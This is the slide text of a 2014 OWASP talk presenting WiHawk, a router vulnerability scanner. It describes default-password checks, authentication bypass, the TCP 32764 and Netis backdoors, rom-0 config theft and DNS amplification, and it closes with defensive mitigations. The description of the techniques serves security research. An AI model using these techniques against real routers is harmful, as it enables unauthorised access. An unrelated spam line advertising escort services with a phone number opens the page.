Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar
1. AppSec USA 2014
Denver, Colorado
Pwning the Pawns with WiHawk
Automated Solution to Pesky Router Problem
Santhosh Kumar
Anamika Singh
2. 2
Free infosec
Supporter |
nearsecurity
Introduction
Santhosh Kumar, India
A Independent Security Research Working on
various domains.
Acknowledged from IBM, INTEL, Microsoft, Cisco,
yahoo & more.
Contributor to the WiHawk Router Vulnerability
Scanner.
Scanner | still write “hello world” |Eng Student
CurrentWork Devices
Current Work on Embedded Devices.
I Run a DEFCON Group @chennai (DC 602028)
@ security_b0x
in.linkedin.com/pub/santhosh-kumar/6a/974/8b9
3. 3
Introduction
Anamika Singh
Product Security Analyst @ IronWASP Information
Security Service Pvt. Ltd.
Author Of the WiHawk Router Vulnerability
Scanner.
Speaker @ HITB/Haxpo Amsterdam, Selenium
International Conf 14, Ground Zero Srilnaka,
NULLCON Goa & DC Group @kerala
@ _Anamikas_
in.linkedin.com/pub/anamika-singh/80/4a5/5b5/
5. 5
Red Team Vs Blue Team
How Many Of you take routers into the real penetration
testing?
Regular Firmware upgrade? Alternative firmware?
Does your internet work?
Remote Management Enabled?
Support from These companies on the security issue is
pathetic.
End of Life is a another issue!! I mean who buys router every
1.5 years :P seriously ?
6. 6
Agenda
Introduction
Sample Router Analysis
Open Source Tools.
Automation Using WiHawk.
Alternative Options.
Post Consequences- Amplification Attacks
22. 22
Vendor Response
• End of Life for the Product?
• Couldn’t Identify the issue.
• North America Got 1.0.44 firmware
but was taken down soon.
• Change Router?
• Is the Internet working?
• Netgear WNR1000 is also affected
27. 27
Outcome of Analysis
Following Firmware are affected Billion, Tplink, Sitecom,
Michelangelo, Edimax, Trust, Airline, Topcom (rompager 4.7
exploit).
No patch for certain devices ( EOL)
Some didn’t even bother to respond
Around 25 Million router still vulnerable
Did the Internet work ?
29. 29
Services are Dangerous too
• ASUS suffered a serious of FTP based service flaws
• It has Disk Enabled Space within the router.
• After the update the Service was patched only for active FTP
mode.
• Passive Mode Continue to work till Date.
• Able to Access the entire Mounted Hard Drive.
32. 32
Vendor Response
• But We Just Patched That.
• That’s the Feature.
• Following Models are Affected.
ASUS RT-N10U
ASUS RT-N56U
ASUS DSL-N55U
ASUS RT-AC66U
ASUS RT-N15U
ASUS RT-N53
• Does the Internet working?
35. 35
WiHawk - Router Vulnerability Scanner
Make sure your life is easy.
https://github.com/santhoshkumar22/Wihawk-SOHO
https://ironwasp.org/download.html
Functionality:
Single IP
Example: 192.168.1.1
Range of IP
Example: 192.168.1.1-25 or 192.168.1.1/25
Shodan API
Geo Location
City
Country
36. 36
WiHawk
WiHawk Scans Router for
Default Configuration
Bypass Authentication
TCP–32768 / TCP-32767 Backdoor
Edit by Joel (Joel’s Backdoor)
CSRF (VIP)
XSS (VIP)
Buffer and Stack Overflow (Beta)
ROM-0
40. 40
Default Passwords
Maintains a file of unique usernames and passwords.
Covers variety of models from different routers like
Linksys
Netgear
Cisco
CNET
Beetel
41. 41
WiHawk Default Response
WiHawk Target IP
Response 401
Request
Response 200
BINGO!
Username : User
Password : pass
42. 42
WiHawk – ByPass Authentication
WiHawk scans Routers for ByPass Authentication
Vulnerability.
Appends IP with bypass String
If vulnerability found prints IP with bypass string
44. 44
WiHawk – Backdoor Detection
Allows a free access to many hosts on the Internet.
Allows various remote commands like:
Remote access to root shell of routers
File copy
WiHawk checks for Backdoors like:
TCP backdoor 32764
Edit By Joel Backdoor
45. 45
TCP 32764 Backdoor
Port
32764
open.?
Create Socket
NO
Port 32764 is not
Vulnerable
NO
Data
found .?
Port 32764 is
vulnerable
Write Socket
Check for response data starts
with “MMcS” or "ScMM"
YES
YES
46. 46
WiHawk – Rom-0 attack
Rom-0 is a router Configuration file.
Located in “IP/rom-0″ & directory isn’t password protected.
Configuration file which contains the “admin” password.
WiHawk:
Checks whether router is vulnerable to rom-0 attack
Downloads rom-0 file
48. 48
Netis/Netcore Backdoor
• This one was detected back in August 2014.
• It has this mysterious service running at port 53413.
• We check if the service is running then try to connect it to
using udpconnect.
• Seems the reference is A*8+netcorea00’
• Observe the connection using netcat.
• Another 2 million devices affected with this.
• Able to reach netis systems after a long call.
52. 52
WiHawk
• WiHawk is built as an integral part of IronWASP .
• IronWASP is an Open Source Web Security Scanner.
53. 53
Ironwasp
• IronWASP is an open source Web
Security Scanner.
• Its one among best Scanners.
• Checks for more than 25
Vulnerabilities.
• It stands better than commercial
scanner in some parameters.
• Some of the other existing modules
are:
– Drupsnipe: Black box Drupal
vulnerability scanner.
– Skanda : Port scan on Server vulnerable
to SSRF.
57. 57
Bigger Threat
• Router not only causes data loss but also contribute to a
bigger attack.
• Threat Comes as a Amplification attacks from these
unpatched routers.
• Almost 25 million is still open to Amplification on various
protocols as we speak.
• DNS,NTP, SMTP etc.
• Observance was made for 2 months.
60. 60
Observe
• We found that most of the traffic from our honeydns server
was directed towards a “gamming network” owned by a
specific corp.
• Amplification varied from 50 gbps to 110 gbps.
• Looks like someone want to establish their “flag” on their
networks. | USIS of URAG and ZIRIA
• 80 % traffic we got from was routers?
62. 62
Solution:
• Firmware Updates. Vendor should do extensive testing.
• If no firmware available, use Open After market firmware like
tomato, dd-wrt, open-wrt.
• Defend against “Purpose domains”.
• ISP’s should implement BCP 38(network ingress filtering) RFC
2827.
• Network admins force out to use TCP instead of UDP.